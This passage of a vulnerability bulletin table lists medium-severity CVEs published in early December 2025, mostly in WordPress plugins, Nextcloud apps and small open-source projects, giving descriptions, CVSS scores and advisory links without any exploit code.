| Microsoft--Microsoft Edge (Chromium-based) | User interface (ui) misrepresentation of critical information in Microsoft Edge for iOS allows an unauthorized attacker to perform spoofing over a network. | 2025-12-05 | 4.3 | CVE-2025-62223 | Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability |
| MiR--Robot | Open redirect in the web server component of MiR Robot and Fleet software allows a remote attacker to redirect users to arbitrary external websites via a crafted parameter, facilitating phishing or social engineering attacks. | 2025-12-01 | 6.1 | CVE-2025-13819 | https://mobile-industrial-robots.com/security-advisories/cve-2025-13819-open-redirect https://supportportal.mobile-industrial-robots.com/documentation/mir-cybersecurity-guide/mir-cybersecurity-guide/ |
| missi--Jabbernotification | The Jabbernotification plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the admin.php PATH_INFO in all versions up to, and including, 0.99-RC2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13622 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8e9a872d-575c-455c-8f26-709878817ae0?source=cve https://wordpress.org/plugins/jabberbenachrichtigung/ https://plugins.trac.wordpress.org/browser/jabberbenachrichtigung/tags/0.99-RC2/jabbernotification.php#L85 https://plugins.trac.wordpress.org/browser/jabberbenachrichtigung/trunk/jabbernotification.php#L85 |
| monkeyboz--Quantic Social Image Hover | The Quantic Social Image Hover plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13360 | https://www.wordfence.com/threat-intel/vulnerabilities/id/43a237fd-5d3a-47fb-bacf-ceb5eeaa8bbb?source=cve https://plugins.trac.wordpress.org/browser/tw-image-hover-share/trunk/tw-image-hover.php#L103 https://plugins.trac.wordpress.org/browser/tw-image-hover-share/tags/1.0.8/tw-image-hover.php#L103 |
| moxi159753--Mogu Blog v2 | A weakness has been identified in moxi159753 Mogu Blog v2 up to 5.2. The affected element is an unknown function of the file /file/pictures. This manipulation of the argument filedatas causes unrestricted upload. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13815 | VDB-333824; moxi159753 Mogu Blog v2 pictures unrestricted upload VDB-333824; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692106; moxi159753 mogu_blog_v2 <=v5.2 Unrestricted Upload of File with Dangerous Type https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-unrestricted_upload-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-unrestricted_upload-1/report.md#proof-of-concept |
| moxi159753--Mogu Blog v2 | A security vulnerability has been detected in moxi159753 Mogu Blog v2 up to 5.2. The impacted element is the function FileOperation.unzip of the file /networkDisk/unzipFile of the component ZIP File Handler. Such manipulation of the argument fileUrl leads to path traversal. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13816 | VDB-333825; moxi159753 Mogu Blog v2 ZIP File unzipFile FileOperation.unzip path traversal VDB-333825; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692107; moxi159753 mogu_blog_v2 <=v5.2 Path Traversal / Zip Slip https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-zip_slip-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-zip_slip-1/report.md#proof-of-concept |
| moxi159753--Mogu Blog v2 | A vulnerability was identified in moxi159753 Mogu Blog v2 up to 5.2. This issue affects some unknown processing of the file /storage/ of the component Storage Management Endpoint. The manipulation leads to missing authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is assessed as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 5.6 | CVE-2025-13813 | VDB-333822; moxi159753 Mogu Blog v2 Storage Management Endpoint storage authorization VDB-333822; CTI Indicators (IOB, IOC, IOA) Submit #692104; moxi159753 mogu_blog_v2 <=v5.2 Broken Access Control / Missing Authorization https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md#proof-of-concept |
| mrdenny--Time Sheets | The Time Sheets plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.3. This is due to missing or incorrect nonce validation on several endpoints. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-10055 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6d8b57de-d02c-40c0-abdb-ff490bcf429e?source=cve https://wordpress.org/plugins/time-sheets/ |
| mxchat--MxChat AI Chatbot for WordPress | The MxChat - AI Chatbot for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.5 via upload filenames. This makes it possible for unauthenticated attackers to extract session values that can subsequently be used to access conversation data. | 2025-12-03 | 5.3 | CVE-2025-12585 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cf1a90d-6157-40e7-aed8-4d18bc22432d?source=cve https://plugins.trac.wordpress.org/browser/mxchat-basic/trunk/includes/class-mxchat-integrator.php#L107 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406402%40mxchat-basic&new=3406402%40mxchat-basic&sfp_email=&sfph_mail= |
| n/a--Blood Bank Management System 1.0 | A session fixation vulnerability exists in Blood Bank Management System 1.0 in login.php that allows an attacker to set or predict a user's session identifier prior to authentication. When the victim logs in, the application continues to use the attacker-supplied session ID rather than generating a new one, enabling the attacker to hijack the authenticated session and gain unauthorized access to the victim's account. | 2025-12-01 | 6.1 | CVE-2025-63529 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63529.md |
| n/a--JIZHICMS | A vulnerability was found in JIZHICMS up to 2.5.5. Impacted is the function commentlist of the file /index.php/admins/Comment/addcomment.html of the component Add Display Name Field. Performing manipulation of the argument aid/tid results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14011 | VDB-334252; JIZHICMS Add Display Name Field addcomment.html commentlist sql injection VDB-334252; CTI Indicators (IOB, IOC, TTP, IOA) Submit #694644; Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 SQL Injection Submit #694645; Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 SQL Injection (Duplicate) https://github.com/24-2021/vul2/blob/main/jizhicms%3DV2.5.5-addcomment.html-aid%20parameter-SQL%20injection/jizhicms-addcomment.html-aid%20parameter-SQL%20injection.md |
| n/a--JIZHICMS | A vulnerability was determined in JIZHICMS up to 2.5.5. The affected element is the function deleteAll/findAll/delete of the file /index.php/admins/Comment/deleteAll.html of the component Batch Delete Comments. Executing manipulation can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14012 | VDB-334253; JIZHICMS Batch Delete Comments deleteAll.html delete sql injection VDB-334253; CTI Indicators (IOB, IOC, TTP, IOA) Submit #694647; Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 SQL Injection https://github.com/24-2021/vul2/blob/main/jizhicms%3DV2.5.5-deleteAll.html-data%20parameter-SQL%20injection/jizhicms%3DV2.5.5-deleteAll.html-data%20parameter-SQL%20injection.md |
| n/a--KerOS prior to 5.12 | Due to a firewall misconfiguration, Kerlink devices running KerOS prior to 5.12 incorrectly accept specially crafted UDP packets. This allows an attacker to bypass the firewall and access UDP-based services that would otherwise be protected. | 2025-12-01 | 5.3 | CVE-2024-32388 | https://www.bdosecurity.de/en-gb/advisories/cve-2024-32388 https://keros.docs.kerlink.com/security/security_advisories_kerOS5 |
| n/a--KerOS prior to version 5.10 | Kerlink gateways running KerOS prior to version 5.10 expose their web interface exclusively over HTTP, without HTTPS support. This lack of transport layer security allows a man-in-the-middle attacker to intercept and modify traffic between the client and the device. | 2025-12-01 | 6.8 | CVE-2024-32384 | https://keros.docs.kerlink.com/security/security_advisories_kerOS5 https://www.bdosecurity.de/en-gb/advisories/cve-2024-32384 |
| n/a--nocobase | A vulnerability was detected in nocobase up to 1.9.4/2.0.0-alpha.37. The affected element is an unknown function of the file nocobase\packages\core\auth\src\base\jwt-service.ts of the component JWT Service. The manipulation of the argument API_KEY results in use of hard-coded cryptographic key. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is described as difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-02 | 5.6 | CVE-2025-13877 | VDB-334033; nocobase JWT Service jwt-service.ts hard-coded key VDB-334033; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692205; https://github.com/nocobase https://github.com/nocobase/nocobase Latest Authorization Bypass https://gist.github.com/H2u8s/f3ede60d7ecfe598ae452aa5a8fbb90d |
| natambu--Twitscription | The Twitscription plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the admin.php PATH_INFO in all versions up to, and including, 0.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13623 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6e7756-d8cc-4380-a93e-47d7916a5f7b?source=cve https://wordpress.org/plugins/twitscription/ https://plugins.trac.wordpress.org/browser/twitscription/tags/0.1.1/twitscription.php#L101 https://plugins.trac.wordpress.org/browser/twitscription/trunk/twitscription.php#L101 |
| nedwp--Feedback Modal for Website | The Feedback Modal for Website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'handle_export' function in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to export all feedback data in CSV or JSON format via the 'export_data' parameter. | 2025-12-05 | 5.3 | CVE-2025-13528 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3341c29-a69e-4618-a8a5-11f4141ff88f?source=cve https://plugins.trac.wordpress.org/browser/feedback-modal-for-website/trunk/inc/admin/main.php#L1011 https://plugins.trac.wordpress.org/browser/feedback-modal-for-website/tags/1.0.1/inc/admin/main.php#L1011 |
| Nextcloud--Nextcloud | Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, and 32.0.1 allows attackers to execute arbitrary JavaScript in the context of a user's browser via a crafted PDF file to viewer.html. This issue is related to CVE-2024-4367, but the root cause of this Nextcloud issue is that the product exposes executable example code on a same-origin basis. | 2025-12-04 | 6.4 | CVE-2025-59788 | https://nextcloud.com https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-003/ https://github.com/nextcloud/security-advisories/security/advisories/GHSA-24wp-p865-7j4r |
| nextcloud--security-advisories | Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.6 and 0.9.3, a malicious user was able to create their own table and then move a column to a victim's table. This vulnerability is fixed in 0.8.6 and 0.9.3. | 2025-12-05 | 6.3 | CVE-2025-66551 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-w787-vwqp-8wr7 https://github.com/nextcloud/tables/pull/1810 https://github.com/nextcloud/tables/commit/39f24a62fb41fd7a8bda65325f8bbafdc91c731c https://hackerone.com/reports/3137895 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server and Server Enterprise prior to 31.0.12 and 32.0.3, a missing sanitization allowed malicious users to circumvent the content security policy when a malicious user manages to trick a user into viewing an uploaded SVG outside of the Nextcloud Server's web page. | 2025-12-05 | 5.4 | CVE-2025-66512 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-qcw2-p26m-9gc5 https://github.com/nextcloud/viewer/pull/3023 https://github.com/nextcloud/viewer/commit/5044a27d61bc40c0f134298d36af91f865335b63 https://hackerone.com/reports/3357808 |
| nextcloud--security-advisories | Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.17 and 5.2.4, when a malicious user creates a calendar event with a crafted attachment that links to a download link of a file on the same Nextcloud server, the file would be downloaded without the user confirming the action. This vulnerability is fixed in 4.7.17 and 5.2.4. | 2025-12-05 | 5.7 | CVE-2025-66550 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-f29c-ppmv-8mcv https://github.com/nextcloud/calendar/pull/6971 https://github.com/nextcloud/calendar/commit/63a6c398db01391eb9fd5297a0d4c3d6e614f769 https://hackerone.com/reports/3112033 |
| nextcloud--security-advisories | Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.14.6 and 1.15.2, a bug in the permission logic allowed users with "Can share" permission to modify the permissions of other recipients. This vulnerability is fixed in 1.14.6 and 1.15.2. | 2025-12-05 | 5.4 | CVE-2025-66557 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wwr8-hx9g-rjvv https://github.com/nextcloud/deck/pull/7131 https://github.com/nextcloud/deck/commit/f1da8b30a455f02373d44154da04494c949a95ae https://hackerone.com/reports/3247499 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1 and Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, contacts search allowed personal data of other users (emails, names, identifiers) to be retrieved without proper access control. This allows an authenticated user to retrieve information about accounts that are not related to them or added as contacts. | 2025-12-05 | 4.5 | CVE-2025-66510 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-495w-cqv6-wr59 https://github.com/nextcloud/server/pull/55657 https://github.com/nextcloud/server/commit/e4866860cbf24a746eb8a125587262a4c8831c57 |
| nextcloud--security-advisories | Nextcloud Calendar is a calendar app for Nextcloud. Prior to 6.0.3, the Calendar app generates participant tokens for meeting proposals using a hash function, allowing an attacker to compute valid participant tokens, which allowed them to request details and submit dates in meeting proposals. The tokens are not purely randomly generated. This vulnerability is fixed in 6.0.3. | 2025-12-05 | 4.8 | CVE-2025-66511 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-whm3-vv55-gf27 https://github.com/nextcloud/calendar/pull/7659 https://github.com/nextcloud/calendar/commit/8de14ae87f321f5f09280d9895a27d54d24f33fb https://hackerone.com/reports/3385434 |
| nextcloud--security-advisories | Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.9, 0.9.6, and 1.0.1, the information which table (numeric ID) is shared with which groups or users and the respective permissions was not limited to privileged users. This vulnerability is fixed in 0.8.9, 0.9.6, and 1.0.1. | 2025-12-05 | 4.3 | CVE-2025-66513 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2cwj-qp49-4xfw https://github.com/nextcloud/tables/pull/2148 https://github.com/nextcloud/tables/commit/b92b9560b1e70a02b103a7aeb9e22e2ab5231873 https://hackerone.com/reports/3334165 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server and Enterprise Server prior to 31.0.1, non-privileged users can modify tags on files they should not have access to via bulk tagging. This vulnerability is fixed in 31.0.1. | 2025-12-05 | 4.3 | CVE-2025-66547 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-hq6c-r898-fgf2 https://github.com/nextcloud/server/issues/51247 https://github.com/nextcloud/server/pull/51288 https://github.com/nextcloud/server/commit/b44f1568f2dc97c746281d99e2342ad679e3d8a9 https://hackerone.com/reports/3040887 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server and Enterprise Server prior to 30.0.9 and 31.0.1, incorrect path handling with groupfolders caused the admin_audit app to not properly log all actions on files and folders inside groupfolders. This vulnerability is fixed in Nextcloud Server and Enterprise Server 30.0.9 and 31.0.1. | 2025-12-05 | 4.3 | CVE-2025-66552 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-ww9m-f8j4-jj9x https://github.com/nextcloud/server/pull/50992 https://github.com/nextcloud/server/commit/7cc005c43c72bc384848cf8cb851895827c412f6 https://hackerone.com/reports/2890071 |
| nextcloud--security-advisories | Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.7 and 0.9.4, authenticated users were able to view meta data of columns in other tables of the Tables app by modifying the numeric ID in a request. This vulnerability is fixed in 0.8.7 and 0.9.4. | 2025-12-05 | 4.3 | CVE-2025-66553 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-p53h-6294-crjw https://github.com/nextcloud/tables/pull/1891 https://github.com/nextcloud/tables/commit/e975f5bfedb6922f04cdd236cde4e26067fe064e https://hackerone.com/reports/3138721 |
| nutzam--NutzBoot | A security flaw has been discovered in nutzam NutzBoot up to 2.6.0-SNAPSHOT. The impacted element is an unknown function of the file nutzboot-demo/nutzboot-demo-simple/nutzboot-demo-simple-web3j/src/main/java/io/nutz/demo/simple/module/EthModule.java of the component Ethereum Wallet Handler. Performing manipulation results in information disclosure. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-01 | 4.3 | CVE-2025-13804 | VDB-333814; nutzam NutzBoot Ethereum Wallet EthModule.java information disclosure VDB-333814; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692050; NutzBoot project NutzBoot NutzBoot 2.6.0-SNAPSHOT Information Disclosure (Wallet password leakage) https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-InfoLeak-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-InfoLeak-1/report.md#vulnerability-details-and-poc |
| omnipressteam--Omnipress | The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-12-05 | 6.4 | CVE-2025-12163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/15aabe3b-1b77-4e4e-9710-cf06924dbcbf?source=cve https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/RestApi/Controllers/V1/FileUploadRestController.php#L57 https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/uploader/FileUploader.php#L85 https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/uploader/FileUploader.php#L106 https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/Core/RestControllersBase.php#L81 https://cwe.mitre.org/data/definitions/434.html https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload |
| opsre--go-ldap-admin | A vulnerability was determined in opsre go-ldap-admin up to 20251011. This issue affects some unknown processing of the file docs/docker-compose/docker-compose.yaml of the component JWT Handler. Manipulation of the argument secret key can lead to use of a hard-coded cryptographic key. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. | 2025-12-03 | 5.6 | CVE-2025-13948 | VDB-334163; opsre go-ldap-admin JWT docker-compose.yaml hard-coded key VDB-334163; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692213; https://github.com/opsre https://github.com/opsre/go-ldap-admin Latest Authorization Bypass https://gist.github.com/H2u8s/a51ac1fe38d62746d1425b70ff49420c |
| optimizingmatters--Autoptimize | The Autoptimize plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LCP Image to preload metabox in all versions up to, and including, 3.1.13 due to insufficient input sanitization and output escaping on user-supplied image attributes in the "create_img_preload_tag" function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-03 | 6.4 | CVE-2025-13401 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed5bdb3-c4cd-4982-bc47-feeff527e284?source=cve https://plugins.trac.wordpress.org/changeset/3401333/autoptimize |
| orionsec--orion-ops | A vulnerability has been found in orionsec orion-ops up to 5925824997a3109651bbde07460958a7be249ed1. Affected by this issue is some unknown functionality of the file orion-ops-api/orion-ops-web/src/main/java/cn/orionsec/ops/controller/MachineInfoController.java of the component SSH Connection Handler. Such manipulation of the argument host/sshPort/username/password/authType leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. A patch should be applied to remediate this issue. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13809 | VDB-333819; orionsec orion-ops SSH Connection MachineInfoController.java server-side request forgery VDB-333819; CTI Indicators (IOB, IOC, IOA) Submit #692069; orionsec (project owner of Orion-ops) Orion-ops (server component) <= master commit 5925824997a3109651bbde07460958a7be249ed1 Server-Side Request Forgery (SSRF) https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-ssrf-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-ssrf-1/report.md#proof-of-concept |
| orionsec--orion-ops | A vulnerability was detected in orionsec orion-ops up to 5925824997a3109651bbde07460958a7be249ed1. Affected is the function MachineKeyController of the file orion-ops-api/orion-ops-web/src/main/java/cn/orionsec/ops/controller/MachineKeyController.java of the component API. The manipulation results in improper authorization. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 4.3 | CVE-2025-13807 | VDB-333817; orionsec orion-ops API MachineKeyController.java MachineKeyController improper authorization VDB-333817; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692066; orionsec Orion-ops (server component) <= master commit 5925824997a3109651bbde07460958a7be249ed1 Improper Access Control / Information Disclosure (exposed machin https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-information-disclosure-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-information-disclosure-1/report.md#proof-of-concept |
| ovologics--PDF Catalog for WooCommerce | The PDF Catalog for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pdfcatalog' AJAX action in all versions up to, and including, 1.1.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 5.4 | CVE-2025-12191 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cb5f5e33-e066-4a85-9367-4b8c2f948adf?source=cve https://wordpress.org/plugins/pdf-catalog-for-woocommerce/ |
| passionui--Listar Directory Listing & Classifieds WordPress Plugin | The Listar - Directory Listing & Classifieds WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the '/wp-json/listar/v1/place/delete' REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts. | 2025-12-06 | 4.3 | CVE-2025-12574 | https://www.wordfence.com/threat-intel/vulnerabilities/id/33b98bee-7f33-4d49-96e1-9a1eafc92bb3?source=cve https://wordpress.org/plugins/listar-directory-listing/ |
| passionui--Listar Directory Listing & Classifieds WordPress Plugin | The Listar - Directory Listing & Classifieds WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/listar/v1/place/save' REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update listing details. | 2025-12-06 | 4.3 | CVE-2025-12577 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a063fab3-6d52-4f2a-b51f-b76fa2d4711c?source=cve https://wordpress.org/plugins/listar-directory-listing/ |
| paulepro2019--EPROLO Dropshipping | The EPROLO Dropshipping plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wp_ajax_eprolo_delete_tracking and wp_ajax_eprolo_save_tracking_data AJAX endpoints in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify and delete tracking data. | 2025-12-05 | 4.3 | CVE-2025-12133 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a124da63-01a4-44d8-985b-cacef58ea9a3?source=cve https://wordpress.org/plugins/eprolo-dropshipping/ |
| PDF-XChange Co. Ltd--PDF-XChange Editor | An out-of-bounds read vulnerability exists in the EMF functionality of PDF-XChange Co. Ltd PDF-XChange Editor 10.7.3.401. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information. | 2025-12-02 | 6.5 | CVE-2025-58113 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2280 |
| phegman--Trail Manager | The Trail Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-05 | 4.4 | CVE-2025-13682 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eb43502e-dedd-46ff-b8e8-68298779f125?source=cve https://wordpress.org/plugins/trail-manager/ |
| pntrinh--TR Timthumb | The TR Timthumb plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13899 | https://www.wordfence.com/threat-intel/vulnerabilities/id/675bf571-eb8b-4c72-9852-b3a2b37b9a04?source=cve https://plugins.trac.wordpress.org/browser/tr-timthumb/trunk/inc/front.php#L39 https://plugins.trac.wordpress.org/browser/tr-timthumb/tags/1.0.4/inc/front.php#L39 |
| posimyththemes--Nexter Extension Site Enhancements Toolkit | The Nexter Extension - Site Enhancements Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nxt-year' shortcode in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-02 | 6.4 | CVE-2025-13731 | https://www.wordfence.com/threat-intel/vulnerabilities/id/809cd97c-22ea-49e7-be46-688fefe50236?source=cve https://plugins.trac.wordpress.org/browser/nexter-extension/trunk/include/class-nexter-load-ext.php#L66 https://plugins.trac.wordpress.org/browser/nexter-extension/trunk/include/class-nexter-load-ext.php#L136 https://plugins.trac.wordpress.org/changeset?old=3402155&old_path=nexter-extension%2Ftags%2F4.4.1%2Finclude%2Fclass-nexter-load-ext.php&new=3403967&new_path=nexter-extension%2Ftags%2F4.4.2%2Finclude%2Fclass-nexter-load-ext.php |
| projectopia--Projectopia WordPress Project Management | The Projectopia - WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pto_delete_file AJAX action in all versions up to, and including, 5.1.19. This makes it possible for unauthenticated attackers to delete arbitrary attachments. | 2025-12-05 | 5.3 | CVE-2025-12876 | https://www.wordfence.com/threat-intel/vulnerabilities/id/940c6a27-05a2-4eca-89ee-b483f88b9524?source=cve https://plugins.trac.wordpress.org/browser/projectopia-core/trunk/includes/functions/general/general_functions.php#L389 |
| ProudMuBai--GoFilm | A vulnerability was identified in ProudMuBai GoFilm 1.0.0/1.0.1. Impacted is the function SingleUpload of the file /server/controller/FileController.go. The manipulation of the argument File leads to unrestricted upload. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-03 | 6.3 | CVE-2025-13949 | VDB-334164; ProudMuBai GoFilm FileController.go SingleUpload unrestricted upload VDB-334164; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692774; GoFilm 1.0.1 Unrestricted Upload https://github.com/yzlala1147/cve/issues/1 |
| Rareprob--HD Video Player All Formats App | A security vulnerability has been detected in Rareprob HD Video Player All Formats App 12.1.372 on Android. Impacted is an unknown function of the component com.rocks.music.videoplayer. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-02 | 5.3 | CVE-2025-13876 | VDB-334032; Rareprob HD Video Player All Formats App com.rocks.music.videoplayer path traversal VDB-334032; CTI Indicators (IOB, IOC, TTP) Submit #692169; RAREPROB SOLUTIONS PRIVATE LIMITED HD Video Player All Formats APP(com.rocks.music.videoplayer) V12.1.372 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/blob/main/HD%20Video%20Player%20All%20Formats/HD%20Video%20Player%20All%20Formats%20APP%20Arbitrary%20File%20Overwrite%20Vulnerability.md |
| Rarlab--RAR App | A security vulnerability has been detected in Rarlab RAR App up to 7.11 Build 127 on Android. This affects an unknown part of the component com.rarlab.rar. Such manipulation leads to path traversal. It is possible to launch the attack remotely. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The exploit has been disclosed publicly and may be used. Upgrading to version 7.20 build 128 is able to mitigate this issue. You should upgrade the affected component. The vendor responded very professionally: "This is the real vulnerability affecting RAR for Android only. WinRAR and Unix RAR versions are not affected. We already fixed it in RAR for Android 7.20 build 128 and we publicly mentioned it in that version changelog. (...) To avoid confusion among users, it would be useful if such disclosure emphasizes that it is RAR for Android only issue and WinRAR isn't affected." | 2025-12-05 | 5 | CVE-2025-14111 | VDB-334491; Rarlab RAR App com.rarlab.rar path traversal VDB-334491; CTI Indicators (IOB, IOC, TTP) Submit #697375; Rarlab RAR 